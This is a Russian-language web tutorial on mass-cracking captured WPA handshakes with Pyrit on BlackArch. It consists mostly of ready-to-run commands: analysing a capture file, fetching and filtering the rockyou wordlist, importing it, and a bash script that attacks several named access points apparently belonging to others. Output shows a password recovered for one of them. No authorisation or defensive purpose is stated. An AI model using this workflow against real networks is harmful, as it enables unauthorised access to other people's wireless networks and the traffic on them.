You are here: Home » Взлом Wi-Fi сетей » Массовый взлом рукопожатий в BlackArch с помощью Pyrit

Массовый взлом рукопожатий в BlackArch с помощью Pyrit

Если ставится задача массового подбора паролей к захваченным рукопожатиям (т. е. когда много рукопожатий от разных точек доступа), то в этом нам может помочь Pyrit.

Если вы слабо знакомы с Pyrit, то я рекомендовал бы вам следующие источники:

Начнём с анализа того, что у нас есть:

pyrit -r "hndshk/auto3-02.cap" analyze

006

Из всего этого, меня интересуют только рукопожатия от следующих точек доступа:

  • DANIELLE2015
  • Kitty
  • openbox

Поскольку импорт паролей нам нужно сделать один раз, то с него и начнём. Чтобы это сделать, нам нужно где-то достать словарь. Я позаимствую его у коллег — вы же можете воспользоваться своим любимым словарём:

git clone git://git.kali.org/packages/wordlists.git

Распакуем его.

gunzip ~/wordlists/rockyou.txt.gz

Почистим его:

cat wordlists/rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > wordlists/newrockyou.txt

Примечание: Программа pw-inspector является частью пакета Hydra, поэтмоу если у вас появилась ошибка, что команда не найдена, то установите пакет Hydra:

sudo pacman -S hydra

Теперь импортируем словарь Pyrit:

pyrit -i ./wordlists/newrockyou.txt import_passwords

Для некоторой автоматизации, создайте исполнимый файл pyrit_mas.sh и скопируйте туда:

#!/bin/bash

FILE='hndshk/auto3-02.cap'

for i in `seq 1 1 $#`; do
pyrit -e ${!i} create_essid
done

pyrit batch

for i in `seq 1 1 $#`; do
echo '==============================================='
echo 'Ищем пароли для '${!i}
pyrit -r $FILE -e ${!i} attack_db
done

Обратите внимание на строку:

FILE='hndshk/auto3-02.cap'

В ней вместо hndshk/auto3-02.cap вам нужно указать путь до вашего файла с рукопожатиями.

Запускать так:

bash pyrit_mas.sh ТочкаДоступа1 ТочкаДоступа2 ТочкаДоступа3

Мой пример

bash pyrit_mas.sh DANIELLE2015 Kitty openbox

Т.е. просто перечисляете точки доступа, для которых у вас есть рукопожатия и которые вы хотите взломать. Результат выполнения в моём случае:

 008

009

Самое интересно здесь:

Picked AccessPoint 54:b8:0a:93:b8:f5 automatically...
Attacking handshake with Station 98:3b:16:8f:62:ed...
Tried 1126073 PMKs so far (11.7%); 413544565 PMKs per second.

The password is '0987654321'.

Т.е. для точки доступа с 54:b8:0a:93:b8:f5 (это openbox) пароль подобран.

Для очистки места:

pyrit -e ТочкаДоступа delete_essid

Т.е. я делаю так:

pyrit -e DANIELLE2015 delete_essid
pyrit -e Kitty delete_essid
pyrit -e openbox delete_essid

Автоматическую очистку можно, кстати, добавить и в мой скрипт.

Ну или просто можете грохнуть весь каталог (также будут удалены импортированные пароли):

rm -rf ~/.pyrit

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *